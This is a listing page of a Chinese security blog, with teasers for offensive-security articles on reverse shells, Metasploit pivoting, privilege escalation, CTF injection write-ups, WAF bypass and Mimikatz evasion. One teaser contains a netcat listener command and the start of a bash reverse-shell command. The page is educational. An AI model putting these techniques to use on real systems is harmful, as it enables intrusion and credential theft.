amp - 第 6 | CN-SEC 中文网

安全博客

【知识积累】反弹shell方法备忘录

bash反弹：首先公网主机监听指定端口，然后肉鸡执行bash命令向公网指定端口发送连接请求 12345公网主机： nc -lvvp 9090肉鸡执行： bash -c 'exec bash ...

01月10日42 views评论

阅读全文

安全博客

【内网穿透】metasploit跨路由进内网

前言 metasploit 通过增加路由来扫描对应端口路由方式进内网首先提权到了system权限 1、看有几个网段 1run get_local_subnets 2、增加一个网段的路由 1234ru...

01月10日101 views评论

阅读全文

安全博客

【提权】提权扫描工具方法

前言提权扫描工具使用 Windows-Exploit-Suggester Windows-Exploit-Suggester这个工具很强，但是依赖更新了，所以有几个坑，我记录一下 1、安装 1git...

01月10日165 views评论

阅读全文

CTF专场

【ctfshow】变量覆盖简单理解 wp

前言记录web的题目wp，慢慢变强，铸剑。变量覆盖web105123456789101112131415161718192021highlight_file(__FILE__);include('...

01月10日66 views评论

阅读全文

CTF专场

【ctfshow】Linux命令行注入无回显盲注 wp

前言记录web的题目wp，慢慢变强，铸剑。命令行之无回显注入web13912345678910111213141516<?phperror_reporting(0);function che...

01月10日233 views评论

阅读全文

代码审计

某大型CMS后台注入从分析到利用

本文首发于奇安信攻防社区社区有奖征稿· 基础稿费、额外激励、推荐作者、连载均有奖励，年度投稿top3还有神秘大奖！· 将稿件提交至奇安信攻防社区（点击底部阅读原文，加入社区）点...

01月09日188 views评论

阅读全文

安全博客

文件上传绕waf

综述文件上传实质上还是客户端的post请求，消息主题是一些上传信息。前端上传界面需要制定enctype为multipart/from-data 才能正常上传文件。此处不讲各种中间件解析漏洞，只列举...

01月06日170 views评论

阅读全文

安全博客

MacOS使用proxychains-ng

源码安装Proxychains-ng 12345"""不推荐：brew install proxychains-ng # 超慢"""$ gi...

01月06日481 views评论

阅读全文

CentOS搭建msf框架

centos7安装Metasploit框架 Metasploit应该不用多说了吧？Kali自带、Win和Mac都提供了现成的安装包，不过我莫名的对apt系不感冒，这里记录一下在centos7上安装me...

01月06日安全博客263 views评论

阅读全文

Andoird签名文件META-INF详解

在Android的apk包中含有一个叫做META-INF的文件夹，这个里边存储的是关于签名的一些信息。其中将apk包解压出来，进入META-INF目录，发现会有3个文件：CERT.RSA，CERT....

01月06日安全博客64 views评论

阅读全文

安全博客

Android渗透测试基础及工具

Android 架构Android 是基于 Linux 平台的操作系统。Android的系统架构和其操作系统一样，采用了分层的架构。从架构图看，Android分为四个层，从高层到低层分别是应用程序层、...

01月06日92 views评论

阅读全文

安全博客

Mimikatz绕过的方式

Mimikatz介绍Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存，并且获取明文密码和NTLM哈希值的神器，内网渗透中常用mimikatz获取明文密码或者获取hash值来...

01月06日131 views评论

阅读全文

【知识积累】反弹shell方法备忘录

【内网穿透】metasploit跨路由进内网

【提权】提权扫描工具方法

【ctfshow】变量覆盖简单理解 wp

【ctfshow】Linux命令行注入无回显盲注 wp

某大型CMS后台注入从分析到利用

文件上传绕waf

MacOS使用proxychains-ng

CentOS搭建msf框架

Andoird签名文件META-INF详解

Android渗透测试基础及工具

Mimikatz绕过的方式

在线咨询

微信